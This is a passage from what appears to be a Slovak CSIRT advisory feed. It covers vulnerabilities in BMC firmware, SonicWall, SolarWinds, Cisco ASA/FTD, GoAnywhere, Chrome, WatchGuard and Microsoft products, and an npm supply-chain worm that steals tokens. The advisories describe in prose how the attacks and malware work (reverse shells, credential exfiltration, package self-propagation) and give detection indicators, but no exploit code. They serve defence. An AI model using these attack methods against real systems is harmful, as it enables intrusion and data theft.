Pozn.: Aktuálne verzie firmvéru pre jednotlivé produkty môžete nájsť na stránke výrobcu v časti „Affected products“

Opis zraniteľnosti:

CVE-2025-7937, CVE-2025-6198 (CVSSv3.1 skóre 7,2)

Zraniteľnosti spočívajú v nesprávnom overovaní kryptografických podpisov a podvrhnutím špeciálne vytvoreného obrazu firmvéru ich možno zneužiť na obídenie bezpečnostných mechanizmov pre inštaláciu firmvéru a získanie úplnej kontroly nad systémom.

CVE-2025-7937 obchádza bezpečnostný mechanizmus RoT (Root of Trust) a CVE-2025-6198 mechanizmus Signing Table. Podľa bezpečnostných výskumníkov z Binarly, CVE-2025-7937 obchádza nedostatočnú opravu CVE-2024-10237.

Možné škody:

Obídenie bezpečnostných mechanizmov
Neoprávnená zmena v systéme
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame bezodkladnú aktualizáciu BMC firmvéru na verzie špecifikované výrobcom.

Zdroje:

Nový firmvér pre zariadenia SonicWall SMA 100 dokáže odstrániť známe rootkity

Marian Danko — Wed, 01 Oct 2025 15:07:07 +0000

Spoločnosť SonicWall vydala aktualizáciu firmwaru pre svoje zariadenia série SMA 100, ktorá zavádza pokročilú kontrolu integrity súborov a dokáže identifikovať a odstrániť známe rootkity. Hackerská skupina UNC6148 zneužívala zraniteľnosti webového servera Apache CVE-2024-38475 a SMA 100 CVE-2025-40599 na šírenie rootkitu OVERSTEP.

Zraniteľné systémy:

Zariadenia SonicWall série SMA 100 (SMA 210, 410, 500v) s firmvérom vo verzii staršej ako 10.2.2.2-92sv

Pozn.: SonicWall 1. októbra 2025 ukončil poskytovanie technickej podpory pre SMA 100

Opis:

Nový update firmvéru pre zariadenia SMA (Secure Mobile Access) série SMA 100 zavádza pokročilú kontrolu integrity súborov, pomocou ktorej dokáže identifikovať a odstrániť známe rootkity.

Podľa analýzy GTIG (Google Threat Intelligence Group) z júla 2025 hackerská skupina UNC6148 aktívne zneužívala kritické zraniteľnosti CVE-2024-38475, CVE-2025-40599 na infekciu rootkitom OVERSTEP. Malware zabezpečoval perzistentný prístup, vytváral reverzný shell a exfiltroval citlivé údaje ako persist.database, certifikáty, prihlasovacie údaje a OTP seedy. Tie útočníci zneužívali na realizáciu ďalších útokov.

Možné škody:

Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame bezodkladnú aktualizáciu firmvéru zariadení série SMA 100 na verziu 10.2.2.2-92sv. Výrobca taktiež vyzýva na implementáciu odporúčaní z júla 2025, ktoré okrem aktualizácie firmvéru vyzývajú aj na reset MFA tokenov a hardening zariadení. Vzhľadom na blížiaci sa dátum ukončenia poskytovania technickej podpory odporúčame včasný prechod na alternatívne produkty s platnou podporou.

Zdroje:

SolarWinds vydáva už tretiu aktualizáciu na opravu kritickej zraniteľnosti v Web Help Desk

Marian Danko — Wed, 01 Oct 2025 15:05:30 +0000

Spoločnosť SolarWinds vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť v produkte Web Help Desk. CVE-2025-26399 možno zneužiť na vzdialené vykonanie príkazov a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

SolarWinds Web Help Desk vo verziách starších ako 12.8.7 Hotfix 1

Opis zraniteľnosti:

CVE-2025-26399 (CVSSv3.1 skóre 9,8)

Kritická zraniteľnosť s identifikátorom CVE-2025-26399 sa nachádza v komponente AjaxProxy, ktorý umožňuje nebezpečnú deserializáciu dát. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonávanie príkazov a získanie úplnej kontroly nad systémom.

Zraniteľnosť umožňuje obísť nedostatočnú záplatu pre CVE-2024-28988, ktorá opravovala nedostatočnú záplatu kritickej zraniteľnosti CVE-2024-28986. Americká CISA zaradila CVE-2024-28986 v auguste 2024 do zoznamu aktívne zneužívaných zraniteľností katalógu KEV (Known Exploited Vulnerabilites).

Možné škody:

Vzdialené vykonanie príkazov
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame bezodkladnú aktualizáciu Web Help Desk na verziu 12.8.7 Hotfix 1. Kompletný návod môžete nájsť na stránke výrobcu.

Zdroje:

Cisco v súvislosti so zero-day zraniteľnosťami odporúča bezodkladnú aktualizáciu firewallov ASA a FTD

Marian Danko — Mon, 29 Sep 2025 12:22:40 +0000

Spoločnosť CISCO vydala bezpečnostné aktualizácie, ktoré okrem iného opravujú dve aktívne zneužívané zero-day zraniteľnosti vo firewalloch ASA (Adaptive Security Appliance) a FTD (Firewall Threat Defense). CVE-2025-20362 možno zneužiť na obídenie mechanizmov autentifikácie a CVE-2025-20333 na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

Zraniteľné systémy:

Firewally Cisco ASA (Adaptive Security Appliance) s aktívnymi zraniteľnými funkciami AnyConnect IKEv2 Remote Access, Mobile User Security (MUS) alebo SSL VPN
Firewally Cisco FTD (Firewall Threat Defense) s aktívnymi zraniteľnými funkciami AnyConnect IKEv2 Remote Access alebo AnyConnect SSL VPN

Pozn.: Konkrétne verzie zraniteľných produktov môžete nájsť prostredníctvom nástroja Cisco Software Checker.

Opis zraniteľnosti:

CVE-2025-20333 (CVSSv3.1 skóre 9,9)

CVE-2025-20333 sa nachádza v komponente VPN Web Server a spočíva v nedostatočnom overovaní používateľských vstupov v HTTP(S) požiadavkách. Vzdialený autentifikovaný útočník s platnými prihlasovacími údajmi VPN by zraniteľnosť zaslaním špeciálne vytvorených HTTP požiadaviek mohol zneužiť na vzdialené vykonanie kódu a získanie úplnej kontroly nad systémom.

CVE-2025-20362 (CVSSv3.1 skóre 7,7)

CVE-2025-20362 spočíva v nedostatočnom overovaní používateľských vstupov v rámci HTTP(S) požiadaviek s nedostatočnej implementácii mechanizmov autentifikácie. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na obídenie mechanizmov autentifikácie a získanie prístupu k koncovým bodom URL, ktoré by mali byť prístupné len pre prihlásených používateľov.

CVE-2025-20363 (CVSSv3.1 skóre 7,7)

CVE-2025-20363 by vzdialený neautentifikovaný útočník zaslaním špeciálne vytvorených HTTP požiadaviek mohol zneužiť na získanie informácií o systéme a vzdialené vykonanie kódu.

Aktívne zneužívanie zraniteľností CVE-2025-20333 a CVE-2025-20362:

Zraniteľnosti CVE-2025-20333 a CVE-2025-20362 v súčasnosti aktívne zneužívajú útočníci, ktorí v apríli 2024 stáli aj za kampaňou ArcaneDoor. Pre túto kampaň CSIRT.SK vydal 29. apríla 2024 varovanie. ArcaneDoor zraniteľnosti zneužíva na vzdialené vykonanie kódu a manipuláciu pamäte ROM na zachovanie perzistencie po reštartoch alebo upgradov zariadení.

Americká CISA zraniteľnosti zároveň pridala do katalógu aktívne zneužívaných zraniteľností KEV (Known Exploited Vulnerabilities). NCSC-UK v súvislosti so zneužitím zraniteľností identifikovalo dva nové malwary RAYINITIATOR a LINE VIPER. RayInitiator je perzistentný GRUB (GRand Unified Bootloader) bootkit, ktorý sa flashuje do pamäte ROM a je schopný prežiť reštarty zariadenia a upgrady firmvéru. Jeho primárnou úlohou je priamo do operačnej pamäte zariadenia načítať LINE VIPER, ktorý dokáže spúšťať CLI príkazy, zachytávať pakety, obchádzať VPN AAA, potlačiť správy syslog, zachytávať CLI príkazy a za účelom prevencie diagnostiky spôsobuje úmyselné reštarty zariadenia.

Možnú existenciu zero-day zraniteľností indikovalo aj zvýšené skenovanie za účelom identifikácie Cisco ASA portov a Cisco IOS Telnet/SSH služieb, ktoré koncom augusta 2025 zachytila spoločnosť Greynoise.

Možné škody:

Obídenie mechanizmov autentifikácie
Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame postupovať podľa návodu výrobcu, ktorý bol vydaný špecificky za účelom riešenia tejto kampane. Cisco taktiež odporúča aktivovať funkciu Threat Detection for VPN Services, ktorú možno zapnúť podľa návodu.

Infekciu zariadení možno identifikovať aj vyhľadávaním anomálií v logoch:

zamerajte sa najmä na zníženie počtu prípadne úplne chýbajúce záznamy o udalostiach SYSLOG

302013 (“informational” level)
302014 (“informational” level)
609002 (“debug” level)
710005 (“debug” level)

deaktivovaná funkcia checkheaps. Predvolene sa checkheaps spustí raz za 60 sekúnd. Vydanie príkazu show checkheaps vygeneruje výstup podobný nižšie uvedenému vzorovému výstupu. Odporúčame tento príkaz vykonávať raz za minútu počas piatich minút. Pokiaľ nepozorujete zmenu v zobrazovanom počte spustení, môže to indikovať kompromitáciu.

firewall# show checkheaps
Checkheaps stats from buffer validation runs
——————————————–
Time elapsed since last run      : 28 secs
Duration of last run             : 0 millisecs
Number of buffers created        : 106
Number of buffers allocated      : 103
Number of buffers free           : 3
Total memory in use              : 110620 bytes
Total memory in free buffers     : 124 bytes
Total number of runs             : 6352

Zdroje:

Kompromitované balíčky v knižnici NPM šíria malvér

Marian Danko — Mon, 29 Sep 2025 09:09:58 +0000

Bezpečnostní výskumníci odhalili nový útok na dodávateľský reťazec v npm registri, ktorý zasiahol stovky balíčkov od rôznych udržiavateľov. Tieto balíčky sa používajú ako súčasti softvéru a webových stránok, od komerčných aplikácií až po open-source projekty, čo znamená, že počet ohrozených produktov nie je možné presne určiť.

Infikované balíčky:

@ahmedhfarag/ngx-perfect-scrollbar 20.0.20
@ahmedhfarag/ngx-virtual-scroller 4.0.4
@art-ws/common 2.0.22, 2.0.28
@art-ws/config-eslint 2.0.4, 2.0.5
@art-ws/config-ts 2.0.7, 2.0.8
@art-ws/db-context 2.0.24
@art-ws/di 2.0.28, 2.0.32
@art-ws/di-node 2.0.13
@art-ws/eslint 1.0.5, 1.0.6
@art-ws/fastify-http-server 2.0.24, 2.0.27
@art-ws/http-server 2.0.21, 2.0.25
@art-ws/openapi 0.1.9, 0.1.12
@art-ws/package-base 1.0.5, 1.0.6
@art-ws/prettier 1.0.5, 1.0.6
@art-ws/slf 2.0.15, 2.0.22
@art-ws/ssl-info 1.0.9, 1.0.10
@art-ws/web-app 1.0.3, 1.0.4
@crowdstrike/commitlint 8.1.1, 8.1.2
@crowdstrike/falcon-shoelace 0.4.1, 0.4.2
@crowdstrike/foundry-js 0.19.1, 0.19.2
@crowdstrike/glide-core 0.34.2, 0.34.3
@crowdstrike/logscale-dashboard 1.205.1, 1.205.2
@crowdstrike/logscale-file-editor 1.205.1, 1.205.2
@crowdstrike/logscale-parser-edit 1.205.1, 1.205.2
@crowdstrike/logscale-search 1.205.1, 1.205.2
@crowdstrike/tailwind-toucan-base 5.0.1, 5.0.2
@ctrl/deluge 7.2.1, 7.2.2
@ctrl/golang-template 1.4.2, 1.4.3
@ctrl/magnet-link 4.0.3, 4.0.4
@ctrl/ngx-codemirror 7.0.1, 7.0.2
@ctrl/ngx-csv 6.0.1, 6.0.2
@ctrl/ngx-emoji-mart 9.2.1, 9.2.2
@ctrl/ngx-rightclick 4.0.1, 4.0.2
@ctrl/qbittorrent 9.7.1, 9.7.2
@ctrl/react-adsense 2.0.1, 2.0.2
@ctrl/shared-torrent 6.3.1, 6.3.2
@ctrl/tinycolor 4.1.1, 4.1.2
@ctrl/torrent-file 4.1.1, 4.1.2
@ctrl/transmission 7.3.1
@ctrl/ts-base32 4.0.1, 4.0.2
@hestjs/core 0.2.1
@hestjs/cqrs 0.1.6
@hestjs/demo 0.1.2
@hestjs/eslint-config 0.1.2
@hestjs/logger 0.1.6
@hestjs/scalar 0.1.7
@hestjs/validation 0.1.6
@nativescript-community/arraybuffers 1.1.6, 1.1.7, 1.1.8
@nativescript-community/gesturehandler 2.0.35
@nativescript-community/perms 3.0.5, 3.0.6, 3.0.7, 3.0.8
@nativescript-community/sentry 4.6.43
@nativescript-community/sqlite 3.5.2, 3.5.3, 3.5.4, 3.5.5
@nativescript-community/text 1.6.9, 1.6.10, 1.6.11, 1.6.12, 1.6.13
@nativescript-community/typeorm 0.2.30, 0.2.31, 0.2.32, 0.2.33
@nativescript-community/ui-collectionview 6.0.6
@nativescript-community/ui-document-picker 1.1.27, 1.1.28
@nativescript-community/ui-drawer 0.1.30
@nativescript-community/ui-image 4.5.6
@nativescript-community/ui-label 1.3.35, 1.3.36, 1.3.37
@nativescript-community/ui-material-bottom-navigation 7.2.72, 7.2.73, 7.2.74, 7.2.75
@nativescript-community/ui-material-bottomsheet 7.2.72
@nativescript-community/ui-material-core 7.2.72, 7.2.73, 7.2.74, 7.2.75, 7.2.76
@nativescript-community/ui-material-core-tabs 7.2.72, 7.2.73, 7.2.74, 7.2.75, 7.2.76
@nativescript-community/ui-material-ripple 7.2.72, 7.2.73, 7.2.74, 7.2.75
@nativescript-community/ui-material-tabs 7.2.72, 7.2.73, 7.2.74, 7.2.75
@nativescript-community/ui-pager 14.1.36, 14.1.37, 14.1.38
@nativescript-community/ui-pulltorefresh 2.5.4, 2.5.5, 2.5.6, 2.5.7
@nexe/config-manager 0.1.1
@nexe/eslint-config 0.1.1
@nexe/logger 0.1.3
@nstudio/angular 20.0.4, 20.0.5, 20.0.6
@nstudio/focus 20.0.4, 20.0.5, 20.0.6
@nstudio/nativescript-checkbox 2.0.6, 2.0.7, 2.0.8, 2.0.9
@nstudio/nativescript-loading-indicator 5.0.1, 5.0.2, 5.0.3, 5.0.4
@nstudio/ui-collectionview 5.1.11, 5.1.12, 5.1.13, 5.1.14
@nstudio/web 20.0.4
@nstudio/web-angular 20.0.4
@nstudio/xplat 20.0.5, 20.0.6, 20.0.7
@nstudio/xplat-utils 20.0.5, 20.0.6, 20.0.7
@operato/board 9.0.36, 9.0.37, 9.0.38, 9.0.39, 9.0.40, 9.0.41, 9.0.42, 9.0.43, 9.0.44, 9.0.45, 9.0.46, 9.0.47, 9.0.48, 9.0.49, 9.0.50, 9.0.51
@operato/data-grist 9.0.29, 9.0.35, 9.0.36, 9.0.37
@operato/graphql 9.0.22, 9.0.35, 9.0.36, 9.0.37, 9.0.38, 9.0.39, 9.0.40, 9.0.41, 9.0.42, 9.0.43, 9.0.44, 9.0.45, 9.0.46
@operato/headroom 9.0.2, 9.0.35, 9.0.36, 9.0.37
@operato/help 9.0.35, 9.0.36, 9.0.37, 9.0.38, 9.0.39, 9.0.40, 9.0.41, 9.0.42, 9.0.43, 9.0.44, 9.0.45, 9.0.46
@operato/i18n 9.0.35, 9.0.36, 9.0.37
@operato/input 9.0.27, 9.0.35, 9.0.36, 9.0.37, 9.0.38, 9.0.39, 9.0.40, 9.0.41, 9.0.42, 9.0.43, 9.0.44, 9.0.45, 9.0.46, 9.0.47, 9.0.48
@operato/layout 9.0.35, 9.0.36, 9.0.37
@operato/popup 9.0.22, 9.0.35, 9.0.36, 9.0.37, 9.0.38, 9.0.39, 9.0.40, 9.0.41, 9.0.42, 9.0.43, 9.0.44, 9.0.45, 9.0.46, 9.0.49
@operato/pull-to-refresh 9.0.36, 9.0.37, 9.0.38, 9.0.39, 9.0.40, 9.0.41, 9.0.42
@operato/shell 9.0.22, 9.0.35, 9.0.36, 9.0.37, 9.0.38, 9.0.39
@operato/styles 9.0.2, 9.0.35, 9.0.36, 9.0.37
@operato/utils 9.0.22, 9.0.35, 9.0.36, 9.0.37, 9.0.38, 9.0.39, 9.0.40, 9.0.41, 9.0.42, 9.0.43, 9.0.44, 9.0.45, 9.0.46, 9.0.49
@teselagen/bio-parsers 0.4.30
@teselagen/bounce-loader 0.3.16, 0.3.17
@teselagen/file-utils 0.3.22
@teselagen/liquibase-tools 0.4.1
@teselagen/ove 0.7.40
@teselagen/range-utils 0.3.14, 0.3.15
@teselagen/react-list 0.8.19, 0.8.20
@teselagen/react-table 6.10.19, 6.10.20, 6.10.22
@teselagen/sequence-utils 0.3.34
@teselagen/ui 0.9.10
@thangved/callback-window 1.1.4
@things-factory/attachment-base 9.0.43, 9.0.44, 9.0.45, 9.0.46, 9.0.47, 9.0.48, 9.0.49, 9.0.50
@things-factory/auth-base 9.0.43, 9.0.44, 9.0.45
@things-factory/email-base 9.0.42, 9.0.43, 9.0.44, 9.0.45, 9.0.46, 9.0.47, 9.0.48, 9.0.49, 9.0.50, 9.0.51, 9.0.52, 9.0.53, 9.0.54
@things-factory/env 9.0.42, 9.0.43, 9.0.44, 9.0.45
@things-factory/integration-base 9.0.43, 9.0.44, 9.0.45
@things-factory/integration-marketplace 9.0.43, 9.0.44, 9.0.45
@things-factory/shell 9.0.43, 9.0.44, 9.0.45
@tnf-dev/api 1.0.8
@tnf-dev/core 1.0.8
@tnf-dev/js 1.0.8
@tnf-dev/mui 1.0.8
@tnf-dev/react 1.0.8
@ui-ux-gang/devextreme-angular-rpk 24.1.7
@yoobic/design-system 6.5.17
@yoobic/jpeg-camera-es6 1.0.13
@yoobic/yobi 8.7.53
airchief 0.3.1
airpilot 0.8.8
angulartics2 14.1.1, 14.1.2
browser-webdriver-downloader 3.0.8
capacitor-notificationhandler 0.0.2, 0.0.3
capacitor-plugin-healthapp 0.0.2, 0.0.3
capacitor-plugin-ihealth 1.1.8, 1.1.9
capacitor-plugin-vonage 1.0.2, 1.0.3
capacitorandroidpermissions 0.0.4, 0.0.5
config-cordova 0.8.5
cordova-plugin-voxeet2 1.0.24
cordova-voxeet 1.0.32
create-hest-app 0.1.9
db-evo 1.1.4, 1.1.5
devextreme-angular-rpk 21.2.8
ember-browser-services 5.0.2, 5.0.3
ember-headless-form 1.1.2, 1.1.3
ember-headless-form-yup 1.0.1
ember-headless-table 2.1.5, 2.1.6
ember-url-hash-polyfill 1.0.12, 1.0.13
ember-velcro 2.2.1, 2.2.2
encounter-playground 0.0.2, 0.0.3, 0.0.4, 0.0.5
eslint-config-crowdstrike 11.0.2, 11.0.3
eslint-config-crowdstrike-node 4.0.3, 4.0.4
eslint-config-teselagen 6.1.7, 6.1.8
globalize-rpk 1.7.4
graphql-sequelize-teselagen 5.3.8, 5.3.9
html-to-base64-image 1.0.2
json-rules-engine-simplified 0.2.1, 0.2.4
jumpgate 0.0.2
koa2-swagger-ui 5.11.1, 5.11.2
mcfly-semantic-release 1.3.1
mcp-knowledge-base 0.0.2
mcp-knowledge-graph 1.2.1
mobioffice-cli 1.0.3
monorepo-next 13.0.1, 13.0.2
mstate-angular 0.4.4
mstate-cli 0.4.7
mstate-dev-react 1.1.1
mstate-react 1.6.5
ng2-file-upload 7.0.2, 7.0.3, 8.0.1, 8.0.2, 8.0.3, 9.0.1
ngx-bootstrap 18.1.4, 19.0.3, 19.0.4, 20.0.3, 20.0.4, 20.0.5
ngx-color 10.0.1, 10.0.2
ngx-toastr 19.0.1, 19.0.2
ngx-trend 8.0.1
ngx-ws 1.1.5, 1.1.6
oradm-to-gql 35.0.14, 35.0.15
oradm-to-sqlz 1.1.2, 1.1.5
ove-auto-annotate 0.0.9, 0.0.10
pm2-gelf-json 1.0.4, 1.0.5
printjs-rpk 1.6.1
react-complaint-image 0.0.32, 0.0.35
react-jsonschema-form-conditionals 0.3.18, 0.3.21
react-jsonschema-form-extras 1.0.4
react-jsonschema-rxnt-extras 0.4.9
remark-preset-lint-crowdstrike 4.0.1, 4.0.2
rxnt-authentication 0.0.3, 0.0.4, 0.0.5, 0.0.6
rxnt-healthchecks-nestjs 1.0.2, 1.0.3, 1.0.4, 1.0.5
rxnt-kue 1.0.4, 1.0.5, 1.0.6, 1.0.7
swc-plugin-component-annotate 1.9.1, 1.9.2
tbssnch 1.0.2
teselagen-interval-tree 1.1.2
tg-client-query-builder 2.14.4, 2.14.5
tg-redbird 1.3.1, 1.3.2
tg-seq-gen 1.0.9, 1.0.10
thangved-react-grid 1.0.3
ts-gaussian 3.0.5, 3.0.6
ts-imports 1.0.1, 1.0.2
tvi-cli 0.1.5
ve-bamreader 0.2.6, 0.2.7
ve-editor 1.0.1, 1.0.2
verror-extra 6.0.1
voip-callkit 1.0.2, 1.0.3
wdio-web-reporter 0.1.3
yargs-help-output 5.0.3
yoo-styles 6.0.326

Pozn.: tento zoznam nie je kompletný.

Opis útoku:

Útočníci využili funkciu NpmModule.updatePackage, ktorá sťahuje balíček, upravuje jeho package.json, vkladá škodlivý skript bundle.js, znovu zabaľuje archív a opätovne ho zverejňuje, čím automaticky infikuje závislé balíčky. Cieľom útoku je zneužiť nástroj TruffleHog na vyhľadávanie citlivých údajov, ako sú prístupové tokeny pre GitHub a cloudové služby, a odoslať ich na server pod kontrolou útočníka. Útok cielený na systémy Windows aj Linux môže zneužívať aj CI/CD pipeline cez GitHub Actions, čím umožňuje trvalú exfiltráciu údajov.

Možné škody:

Vzdialené vykonanie príkazov
Únik citlivých informácií
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom a vývojárom sa odporúča skontrolovať svoje prostredie a v prípade zistenia infikovaných balíčkov po ich odstránení zmeniť prístupové údaje a obnoviť npm tokeny. Zároveň je dôležité vyčistiť npm cache a používať súbor package-lock.json a pinované verzie balíčkov, ako aj informovať subdodávateľov o incidente.

Zdroje:

Kritická zraniteľnosť v platforme pre prenos súborov Fortra GoAnyWhere MFT

Marian Danko — Mon, 29 Sep 2025 09:05:36 +0000

Spoločnosť Fortra vydala bezpečnostné aktualizácie webového nástroja pre prenos súborov GoAnywhere MFT (Managed File Transfer), ktoré opravujú kritickú zraniteľnosť. CVE-2025-10035 by vzdialený neautentifikovaný útočník mohol zneužiť na injekciu príkazov a získanie úplnej kontroly nad systémom. Zraniteľnosť je aktívne zneužívaná.

Zraniteľné systémy:

Fortra GoAnywhere MFT 7.8.X vo verziách starších ako 7.8.4
Fortra GoAnywhere MFT 7.6.X vo verziách starších ako Sustain Release 7.6.3

Opis zraniteľnosti:

CVE-2025-10035 (CVSSv3.1 skóre 10,0)

Kritická zraniteľnosť sa nachádza v komponente License Servlet a súvisí s deserializáciou nedôveryhodných dát. Vzdialený útočník by ju podvrhnutím špeciálne vytvorenej odpovede s platným podpisom Licence Response mohol zneužiť na injekciu príkazov a získanie úplnej kontroly nad systémom.

Pozn.: Zraniteľné sú všetky inštancie produktu, ktoré majú administratívnu konzolu voľne prístupnú z internetu. Zraniteľnosť je aktívne zneužívaná minimálne od 10. septembra 2025.

Možné škody:

Vykonanie ľubovoľných príkazov
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu na Fortra GoAnywhere MFT na verziu 7.8.4 alebo Sustain Release 7.6.3. Výrobca rovnako odporúča limitovať prístup k administratívnemu rozhraniu produktu zavedením firewallových pravidiel alebo VPN prístupu.

Zneužitie zraniteľnosti môžete identifikovať analýzou Admin Audit logov a logov aplikácie. Zamerajte sa na chybové hlášky obsahujúce reťazec „SignedObject.getObject“. Prítomnosť výnimiek (eng. Exception) v nasledujúcom tvare indikuje prítomnosť pokusu o zneužitie zraniteľnosti:

ERROR Error parsing license response
java.lang.RuntimeException: InvocationTargetException:
java.lang.reflect.InvocationTargetException
…
at java.base/java.io.ObjectInputStream.readObject(Unknown Source)
at java.base/java.security.SignedObject.getObject(Unknown Source)

Zdroje:

Google opravil aktívne zneužívanú zero-day zraniteľnosť v prehliadači Chrome

Marian Danko — Mon, 29 Sep 2025 09:02:56 +0000

Spoločnosť Google vydala bezpečnostné aktualizácie pre svoj webový prehliadač Chrome, ktoré opravujú 4 vysoko závažné zraniteľnosti, z čoho 1 je označená ako aktívne zneužívaná zero-day. CVE-2025-10585 by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu.

Zraniteľné systémy:

Chrome pre Windows a Mac vo verziách starších ako 140.0.7339.185/.186
Chrome pre Linux vo verziách starších ako 140.0.7339.185

Opis zraniteľnosti:

CVE-2025-10585 (CVSSv3 skóre 8,8)

Zraniteľnosť vysokej závažnosti sa nachádza v komponente V8 a vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvoreného webového obsahu mohol zneužiť na vzdialené vykonanie kódu. CVE-2025-10585 spočíva v nesprávnom vyhodnocovaní dátových typov. Zraniteľnosť je podľa spoločnosti Google aktívne zneužívaná. Tento rok sa jedná už o šiestu zero-day zraniteľnosť Chrome, ktorá bola označená za aktívne zneužívanú.

CVE-2025-10500, CVE-2025-10501, CVE-2025-10502 (CVSSv3 skóre 8,8)

Zraniteľnosti v komponentoch Dawn, WebRTC a ANGLE spočívajú v možnosti použitia odalokovaného miesta v pamäti (CVE-2025-10500, CVE-2025-10501) a pretečení medzipamäte haldy (CVE-2025-10502). Vzdialený neautentifikovaný útočník by ich podvrhnutím špeciálne vytvoreného webového obsahu mohol zneužiť na vzdialené vykonanie kódu alebo zneprístupnenie služby.

Možné škody:

Vzdialené vykonanie kódu
Zneprístupnenie služby (DoS)

Odporúčania:

Administrátorom a používateľom odporúčame bezodkladnú aktualizáciu prehliadača Chrome na najnovšie verzie 140.0.7339.185/.186 (Windows, Mac) a 140.0.7339.185 (Linux).

Zdroje:

Kritická zraniteľnosť v operačnom systéme firewallov WatchGuard Firebox

Marian Danko — Mon, 29 Sep 2025 09:00:49 +0000

Spoločnosť WatchGuard vydala bezpečnostné aktualizácie svojich firewallov Firebox, ktoré opravujú kritickú zraniteľnosť operačného systému Fireware OS. CVE-2025-9242 by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu.

Zraniteľné systémy:

Fireware OS 2025.1 vo verziách starších ako 2025.1.1
Fireware OS 12.x vo verziách starších ako 12.11.4
Fireware OS 12.5.x (modely T15 a T35) vo verziách starších ako 12.5.13
Fireware OS 12.3.1 (release s FIPS certifikáciou) vo verziách bez 12.3.1_Update3 (B722811)
Fireware OS 11.x vo všetkých verziách (jedná sa o produkty s ukončenou podporou)

Opis zraniteľnosti:

CVE-2025-9242 (CVSSv4 skóre 9,3)

Kritická zraniteľnosť spočíva v možnosti zápisu do pamäte mimo povolených hodnôt a vzdialený neautentifikovaný útočník by ju mohol zneužiť na vzdialené vykonanie kódu. Zraniteľnosť je možné zneužiť na VPN pre mobilných používateľov s IKEv2 a BOVPN (Branch Office VPN) s IKEv2 nakonfigurovanom s dynamickou bránou. Ak bol firewall nakonfigurovaný jedným z týchto dvoch spôsobov a tieto konfigurácie boli zmazané, zariadenie môže byť podľa výrobcu stále zraniteľné, pokiaľ má nakonfigurovanú BOVPN so statickou bránou.

Možné škody:

Vzdialené vykonanie kódu
Získanie úplnej kontroly nad systémom

Odporúčania:

Administrátorom odporúčame vykonať bezodkladnú aktualizáciu aspoň na verzie 12.3.1_Update3 (B722811), 12.5.13, 12.11.4, alebo 2025.1.1. V prípade Fireware OS 11.x je potrebné vykonať migráciu na produkty s platnou podporou. Výrobca odporúča vykonať aj hardening BOVPN využívajúcich IpSec a IKEv2. Kompletný návod môžete nájsť online.

Zdroje:

Ransomvér v infraštruktúre: Ako sa ochrániť?

Marian Danko — Fri, 19 Sep 2025 10:15:38 +0000

Hrozba preniknutia útočníkov do IT infraštruktúry organizácie zneužitím rôznych ciest je veľmi reálnym ohrozením chodu celej organizácie. Následná krádež a zašifrovanie dôležitých informácií a systémov môžu vyradiť služby a spôsobiť rozsiahle reputačné a finančné škody. V najhorších prípadoch môžu viesť ku ohrozeniu zdravia a životov, či fyzickým škodám.

Na základe našich skúseností z reálnych prípadov sme pre Vás pripravili súhrn opatrení, ktoré Vám poslúžia ako najlepšia prevencia pred podobnými incidentmi. Nasadením každého jedného z nich o krôčik zvýšite svoju bezpečnosť.

Dokument vo formáte PDF nájdete tu, alebo v sekcii Návody a odporúčania.

Microsoft v rámci Patch Tuesday opravil dve aktívne zneužívané zraniteľnosti

Marian Danko — Thu, 11 Sep 2025 14:47:38 +0000

Spoločnosť Microsoft vydala v septembri 2025 balík opráv pre portfólio svojich produktov opravujúci 81 zraniteľností, z ktorých 8 spoločnosť označila ako kritické. Tieto umožňujú vzdialene vykonávať kód, eskalovať oprávnenia a získať citlivé informácie. Dve zraniteľnosti sú typu zero-day.

Zraniteľné systémy:

Azure Connected Machine Agent
Microsoft 365 Apps for Enterprise for 32-bit Systems
Microsoft 365 Apps for Enterprise for 64-bit Systems
Microsoft AutoUpdate for Mac
Microsoft Excel 2016 (32-bit edition)
Microsoft Excel 2016 (64-bit edition)
Microsoft HPC Pack 2019
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
Microsoft Office 2019 for 32-bit editions
Microsoft Office 2019 for 64-bit editions
Microsoft Office for Android
Microsoft Office LTSC 2021 for 32-bit editions
Microsoft Office LTSC 2021 for 64-bit editions
Microsoft Office LTSC 2024 for 32-bit editions
Microsoft Office LTSC 2024 for 64-bit editions
Microsoft Office LTSC for Mac 2021
Microsoft Office LTSC for Mac 2024
Microsoft OfficePLUS
Microsoft PowerPoint 2016 (32-bit edition)
Microsoft PowerPoint 2016 (64-bit edition)
Microsoft SharePoint Enterprise Server 2016
Microsoft SharePoint Server 2019
Microsoft SharePoint Server Subscription Edition
Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 (GDR)
Microsoft SQL Server 2016 for x64-based Systems Service Pack 3 Azure Connect Feature Pack
Microsoft SQL Server 2017 for x64-based Systems (CU 31)
Microsoft SQL Server 2017 for x64-based Systems (GDR)
Microsoft SQL Server 2019 for x64-based Systems (CU 32)
Microsoft SQL Server 2019 for x64-based Systems (GDR)
Microsoft SQL Server 2022 for x64-based Systems (CU 20)
Microsoft SQL Server 2022 for x64-based Systems (GDR)
Microsoft Word 2016 (32-bit edition)
Microsoft Word 2016 (64-bit edition)
Office Online Server
Windows 10 for 32-bit Systems
Windows 10 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
